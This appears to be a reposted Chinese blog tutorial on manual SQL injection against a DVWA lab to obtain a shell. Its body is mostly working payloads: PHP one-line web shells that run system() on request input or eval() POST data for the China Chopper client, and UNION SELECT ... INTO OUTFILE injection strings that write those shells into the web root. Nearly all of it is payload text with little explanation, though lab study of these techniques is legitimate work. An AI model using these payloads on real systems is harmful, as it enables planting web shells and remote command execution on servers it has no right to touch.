码迷,mamicode.com
首页 > 数据库 > 详细

SQL inject 漏洞手工利用过程详解:get shell

时间:2016-09-04 17:54:20      阅读:364      评论:0      收藏:0      [点我收藏+]

标签:sql

思路:上传一个“后门”,通过控制后门来得到shell,比如一句话木马。比如:

<?system($_REQUEST[‘cmd‘]);?> //通过request提交,执行shell<?php@eval($_POST[‘chopper‘]);?>

//PHP一句话木马,直接上菜刀


这里构造如下语句:

1‘and 1=2 union select "<?",system($_REQUEST[‘cmd‘]);?>"

into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php"#



1‘ and 1=2 union select 1,"<?system($_REQUEST[‘cmd‘]);?>" into outfile "f:\\xampp\\htdocs\\dvwa\\zzz.php"--

技术分享



1‘ and 1=2 union select "<?","system($_REQUEST[‘cmd‘]);?>" into outfile "d:\\

xampp\\htdocs\\dvwa\\zzz.php"


<?php eval($_POST[‘888‘]);?>


1‘ and 1=2 union select 1,"<?php eval($_POST[‘888‘]);?>" into outfile "d:\\xampp\\htdocs\\dvwa\\yyy.php"#

SQL inject 漏洞手工利用过程详解:get shell

标签:sql

原文地址:http://8649210.blog.51cto.com/8639210/1846052

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!